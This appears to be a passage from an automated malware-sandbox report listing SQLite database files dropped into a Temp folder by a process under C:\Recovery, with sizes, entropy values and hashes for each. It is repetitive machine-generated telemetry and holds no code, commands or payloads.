                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\O98AUvxyQW

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\OCZJRH1oVG

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\OGd3Wd6klH

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\OQ2PWUa7HJ

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\OgtVLDmUY8

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\P9tOE8HlLp

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\PIbvkVAXkq

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\PeoNBtEgCn

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\PlFW0kntdw

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Pr5PmBv4GR

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Pz9cwxyTKj

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\QHt8fj97Jj

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\QUfPWVD3sK

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\QYYKKBhQ88

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\Qb2Nx2Sr65

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\QoE5XYYwRV

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\R4o7xNEEpz

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\RLMnl3q0dP

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5707520969659783
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\RRlB7k6cy8

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\RVl0ElJFwk

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\S7ZMNtmbiz

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\S9I1Qi6I6c

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\SEEv5oNTEQ

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
